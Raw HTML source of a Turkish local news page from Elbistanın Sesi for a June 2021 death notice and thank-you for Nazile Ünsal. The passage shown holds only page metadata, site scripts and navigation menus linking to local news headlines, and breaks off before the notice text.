  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Vefat - Teşekkür / Nazile ÜNSAL</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="" />
<meta name="keywords" content="Vefat  Teşekkür  Nazife ÜNSAL" />
<meta name="news_keywords" content="Vefat  Teşekkür  Nazife ÜNSAL">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Vefat - Teşekkür / Nazile ÜNSAL" />
<meta property="og:description" content="" />
  <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/06/vefat_tesekkur_nazife_unsal_h70331_76444.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Vefat - Teşekkür / Nazile ÜNSAL" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html" />
<meta name="twitter:domain" content="http://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Vefat - Teşekkür / Nazile ÜNSAL" />
<meta name="twitter:description" content="" />
<meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/06/vefat_tesekkur_nazife_unsal_h70331_76444.jpg" /><link rel="alternate" href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html">
<link rel="amphtml" href="http://www.elbistaninsesi.com/amp/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html">
  <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/06/vefat_tesekkur_nazife_unsal_h70331_76444.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Vefat - Teşekkür / Nazile ÜNSAL" />
<meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/vefat_tesekkur_nazife_unsal_h70331_76444.jpg" />
<meta itemprop="articleSection" content="Vefatlar" name="section" />
<meta itemprop="dateCreated" content="2021-06-15T13:44:37+02:00" />
<meta itemprop="dateModified" content="2021-06-16T13:38:09+02:00" /><meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/06/vefat_tesekkur_nazife_unsal_h70331_76444.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Vefat  Teşekkür  Nazife ÜNSAL" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'http://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.5348</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">10.3469</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">509.732</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1437</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-pomem-kursunda-yuzde-90-basari-h70348.html" title="Elbistan Belediyesi POMEM kursunda yüzde 90 başarı" >Elbistan Belediyesi POMEM kursunda yüzde 90 başarı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kurak-avinda-yakalandilar-2-h70346.html" title="Kurak avında yakalandılar" >Kurak avında yakalandılar</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/zmo-bugdayin-maliyetini-acikladi-h70345.html" title="ZMO, buğdayın maliyetini açıkladı" >ZMO, buğdayın maliyetini açıkladı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/misir-ureticilerine-yaprak-piresi-uyarisi-h70347.html" title="Mısır üreticilerine yaprak piresi uyarısı" >Mısır üreticilerine yaprak piresi uyarısı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/15-temmuz-etkinlikleri-icin-toplanti-duzenlendi-h70344.html" title="15 Temmuz etkinlikleri için toplantı düzenlendi" >15 Temmuz etkinlikleri için toplantı düzenlendi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/oztunc-ve-torundan-b-termik-santrali-devrediliyor-iddiasi-h70343.html" title="Öztunç ve Torun’dan B Termik Santrali devrediliyor iddiası" >Öztunç ve Torun’dan B Termik Santrali devrediliyor iddiası</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/chpli-vekillerden-elbistan-cikarmasi-h70339.html" title="CHP’li vekillerden Elbistan çıkarması" >CHP’li vekillerden Elbistan çıkarması</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanin-kirmizi-ette-yeniden-marka-olmasinin-adimlari-atiliyor-h70338.html" title="Elbistan’ın kırmızı ette yeniden marka olmasının adımları atılıyor" >Elbistan’ın kırmızı ette yeniden marka olmasının adımları atılıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/dunyanin-en-sacma-binasi-icin-geri-sayim-basladi-h70337.html" title="‘Dünyanın en saçma binası’ için geri sayım başladı" >‘Dünyanın en saçma binası’ için geri sayım başladı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-demirspor-yaz-futbol-okulu-aciliyor-h70336.html" title="Elbistan Demirspor yaz futbol okulu açılıyor" >Elbistan Demirspor yaz futbol okulu açılıyor</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="http://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="7da160a9dfde64677fd3d2db5ec12602101cbaa8" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Vefat - Teşekkür / Nazile ÜNSAL" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="http://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="http://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current"   >Vefatlar</a>
<a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8"    >Güncel</a>
<a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/ahmet-polat-94-yasinda-h70342.html" title="Ahmet Polat 94 Yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/ahmet_polat_94_yasinda_h70342_ae689.jpg" alt="Ahmet Polat 94 Yaşında" />
Ahmet Polat 94 Yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/emir-yildiz-85-yasinda-h70341.html" title="Emir Yıldız 85 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/emir_yildiz_85_yasinda_h70341_150fa.jpg" alt="Emir Yıldız 85 yaşında" />
Emir Yıldız 85 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html" title="Vefat - Teşekkür / Nazile ÜNSAL"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/vefat_tesekkur_nazife_unsal_h70331_76444.jpg" alt="Vefat - Teşekkür / Nazile ÜNSAL" />
Vefat - Teşekkür / Nazile ÜNSAL</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/anma-hayri-corcu-2-h70330.html" title="Anma / Hayri Corcu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/anma_hayri_corcu_h70330_24b20.jpg" alt="Anma / Hayri Corcu" />
Anma / Hayri Corcu</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-pomem-kursunda-yuzde-90-basari-h70348.html" title="Elbistan Belediyesi POMEM kursunda yüzde 90 başarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/elbistan_belediyesi_pomem_kursunda_yuzde_90_basari_h70348_f9e30.jpg" alt="Elbistan Belediyesi POMEM kursunda yüzde 90 başarı" />
Elbistan Belediyesi POMEM kursunda yüzde 90 başarı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/kurak-avinda-yakalandilar-2-h70346.html" title="Kurak avında yakalandılar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/kurak_avinda_yakalandilar_h70346_613ff.jpg" alt="Kurak avında yakalandılar" />
Kurak avında yakalandılar</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/zmo-bugdayin-maliyetini-acikladi-h70345.html" title="ZMO, buğdayın maliyetini açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/zmo_bugdayin_maliyetini_acikladi_h70345_31b61.jpg" alt="ZMO, buğdayın maliyetini açıkladı" />
ZMO, buğdayın maliyetini açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/misir-ureticilerine-yaprak-piresi-uyarisi-h70347.html" title="Mısır üreticilerine yaprak piresi uyarısı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/misir_ureticilerine_yaprak_piresi_uyarisi_h70347_ceaf6.jpg" alt="Mısır üreticilerine yaprak piresi uyarısı" />
Mısır üreticilerine yaprak piresi uyarısı</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
